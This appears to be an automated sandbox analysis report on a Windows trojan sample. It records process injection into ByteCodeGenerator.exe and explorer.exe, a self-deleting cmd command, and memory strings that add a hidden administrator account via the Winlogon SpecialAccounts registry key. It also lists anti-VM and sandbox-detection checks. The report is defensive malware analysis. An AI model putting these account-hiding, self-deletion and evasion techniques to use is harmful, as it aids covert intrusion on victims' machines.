Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0346B040 NtSuspendThread,	3_2_0346B040
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469820 NtEnumerateKey,	3_2_03469820
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034698A0 NtWriteVirtualMemory,	3_2_034698A0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469760 NtOpenProcess,	3_2_03469760
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469770 NtSetInformationFile,	3_2_03469770
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0346A770 NtOpenThread,	3_2_0346A770
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0346A710 NtOpenProcessToken,	3_2_0346A710
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469730 NtQueryVirtualMemory,	3_2_03469730
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469650 NtQueryValueKey,	3_2_03469650
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469670 NtQueryInformationProcess,	3_2_03469670
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469610 NtEnumerateValueKey,	3_2_03469610
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034696D0 NtCreateKey,	3_2_034696D0
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469560 NtWriteFile,	3_2_03469560
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_03469520 NtWaitForSingleObject,	3_2_03469520
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0346AD30 NtSetContextThread,	3_2_0346AD30
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_034695F0 NtQueryInformationFile,	3_2_034695F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9540 NtReadFile,LdrInitializeThunk,	12_2_055E9540
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	12_2_055E9910
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E95D0 NtClose,LdrInitializeThunk,	12_2_055E95D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E99A0 NtCreateSection,LdrInitializeThunk,	12_2_055E99A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9840 NtDelayExecution,LdrInitializeThunk,	12_2_055E9840
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9860 NtQuerySystemInformation,LdrInitializeThunk,	12_2_055E9860
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9710 NtQueryInformationToken,LdrInitializeThunk,	12_2_055E9710
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9FE0 NtCreateMutant,LdrInitializeThunk,	12_2_055E9FE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9780 NtMapViewOfSection,LdrInitializeThunk,	12_2_055E9780
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9650 NtQueryValueKey,LdrInitializeThunk,	12_2_055E9650
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9A50 NtCreateFile,LdrInitializeThunk,	12_2_055E9A50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9660 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_055E9660
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E96D0 NtCreateKey,LdrInitializeThunk,	12_2_055E96D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E96E0 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_055E96E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9950 NtQueueApcThread,	12_2_055E9950
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9560 NtWriteFile,	12_2_055E9560
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055EAD30 NtSetContextThread,	12_2_055EAD30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9520 NtWaitForSingleObject,	12_2_055E9520
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E99D0 NtCreateProcessEx,	12_2_055E99D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E95F0 NtQueryInformationFile,	12_2_055E95F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055EB040 NtSuspendThread,	12_2_055EB040
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9820 NtEnumerateKey,	12_2_055E9820
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E98F0 NtReadVirtualMemory,	12_2_055E98F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E98A0 NtWriteVirtualMemory,	12_2_055E98A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9770 NtSetInformationFile,	12_2_055E9770
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055EA770 NtOpenThread,	12_2_055EA770
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9760 NtOpenProcess,	12_2_055E9760
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055EA710 NtOpenProcessToken,	12_2_055EA710
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9B00 NtSetValueKey,	12_2_055E9B00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9730 NtQueryVirtualMemory,	12_2_055E9730
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055EA3B0 NtGetContextThread,	12_2_055EA3B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E97A0 NtUnmapViewOfSection,	12_2_055E97A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9670 NtQueryInformationProcess,	12_2_055E9670
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9610 NtEnumerateValueKey,	12_2_055E9610
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9A10 NtQuerySection,	12_2_055E9A10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9A00 NtProtectVirtualMemory,	12_2_055E9A00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9A20 NtResumeThread,	12_2_055E9A20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055E9A80 NtOpenDirectoryObject,	12_2_055E9A80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0335A330 NtCreateFile,	12_2_0335A330
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0335A3E0 NtReadFile,	12_2_0335A3E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0335A510 NtAllocateVirtualMemory,	12_2_0335A510
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0335A460 NtClose,	12_2_0335A460
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0335A32F NtCreateFile,	12_2_0335A32F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0335A50A NtAllocateVirtualMemory,	12_2_0335A50A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0335A45A NtClose,	12_2_0335A45A

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487709362.0000000004CCA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487917026.0000000004D33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.488193486.0000000004D9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.488193486.0000000004D9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBytecodeGenerator.exej% vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.489529032.0000000004EB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.489015113.0000000004E4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.485534643.0000000003539000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameJCrJ BCk.exe2 vs SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Virustotal: Detection: 28%

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process created: C:\Windows\SysWOW64\ByteCodeGenerator.exe C:\Windows\SysWOW64\ByteCodeGenerator.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\ByteCodeGenerator.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process created: C:\Windows\SysWOW64\ByteCodeGenerator.exe C:\Windows\SysWOW64\ByteCodeGenerator.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\ByteCodeGenerator.exe"	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Variant.Tedy.130342.18814.exe.log

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@7/1@6/4

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, gQVNSLKQRdLXahbPI/IAccountProvider.cs	Task registration methods: 'CreateAccountWithUIAsync'
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, TTTaeWOQfcIUZMhgd/IVSAccountProviderShim.cs	Task registration methods: 'CreateAccountWithUIAsync'

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_01

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\explorer.exe

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Contains functionality to hide user accounts

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Static file information: File size 1932800 > 1048576

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1cdc00

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: explorer.pdbUGP source: ByteCodeGenerator.exe, 00000003.00000003.562672294.0000000005259000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.571105536.0000000005250000.00000040.10000000.00040000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.564011297.00000000055DC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\v2.0\A1\_work\56\obj\Release.AnyCPU\Vssf.InteractiveClient\MS.VS.Services.Client.Interactive\Microsoft.VisualStudio.Services.Client.Interactive.pdb source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.478773261.0000000000952000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000000.437129193.0000000000952000.00000020.00000001.01000000.00000003.sdmp
Source:	Binary string: wntdll.pdbUGP source: ByteCodeGenerator.exe, 00000003.00000002.569640393.000000000351F000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.471514143.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.473401991.000000000326B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.567423695.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.570117498.00000000053E5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ByteCodeGenerator.exe, ByteCodeGenerator.exe, 00000003.00000002.569640393.000000000351F000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.471514143.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.568524570.0000000003400000.00000040.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.473401991.000000000326B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.567423695.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.570117498.00000000053E5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ByteCodeGenerator.pdb source: explorer.exe, 0000000C.00000002.713955405.0000000005AB7000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: ByteCodeGenerator.pdbGCTL source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.488193486.0000000004D9C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.713955405.0000000005AB7000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: explorer.pdb source: ByteCodeGenerator.exe, 00000003.00000003.562672294.0000000005259000.00000004.00000800.00020000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000002.571105536.0000000005250000.00000040.10000000.00040000.00000000.sdmp, ByteCodeGenerator.exe, 00000003.00000003.564011297.00000000055DC000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Code function: 0_2_0187C3B0 pushfd ; iretd	0_2_0187C471
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_00417049 push 70121DA5h; iretd	3_2_0041704E
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0040900C push FFFFFFCBh; retf	3_2_0040900E
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041EC0E push dword ptr [0099C395h]; ret	3_2_0041ED7D
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041D635 push eax; ret	3_2_0041D688
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041D6EC push eax; ret	3_2_0041D6F2
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041D682 push eax; ret	3_2_0041D688
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0041D68B push eax; ret	3_2_0041D6F2
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_00416F8B push B33011B3h; retf	3_2_00416F95
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	Code function: 3_2_0347D0D1 push ecx; ret	3_2_0347D0E4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_055FD0D1 push ecx; ret	12_2_055FD0E4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0334900C push FFFFFFCBh; retf	12_2_0334900E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_03357049 push 70121DA5h; iretd	12_2_0335704E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_03356F8B push B33011B3h; retf	12_2_03356F95
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0335D635 push eax; ret	12_2_0335D688
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0335D682 push eax; ret	12_2_0335D688
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0335D68B push eax; ret	12_2_0335D6F2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0335D6EC push eax; ret	12_2_0335D6F2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 12_2_0335EC0E push dword ptr [0099C395h]; ret	12_2_0335ED7D

Source: initial sample

Static PE information: section name: .text entropy: 7.09655147134

Hooking and other Techniques for Hiding and Protection

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: localgroup administrators aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Variant.Tedy.130342.18814.exe PID: 7000, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.480809439.0000000003231000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	RDTSC instruction interceptor: First address: 0000000000408C14 second address: 0000000000408C1A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	RDTSC instruction interceptor: First address: 0000000000408FAE second address: 0000000000408FB4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 0000000003348C14 second address: 0000000003348C1A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 0000000003348FAE second address: 0000000003348FB4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe TID: 7020

Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe

Code function: 3_2_00408EE0 rdtsc

3_2_00408EE0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\ByteCodeGenerator.exe	API coverage: 9.0 %
Source: C:\Windows\SysWOW64\explorer.exe	API coverage: 9.2 %

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.130342.18814.exe

Thread delayed: delay time: 922337203685477

Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\EnumNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000004.00000000.519486009.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WWW /c Microsoft-Hyper-V-Common-Drivers-Package
Source: explorer.exe, 00000004.00000000.538747034.000000000807B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
Source: SecuriteInfo.com.Variant.Tedy.130342.18814.exe, 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: explorer.exe, 00000004.00000000.538747034.000000000807B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
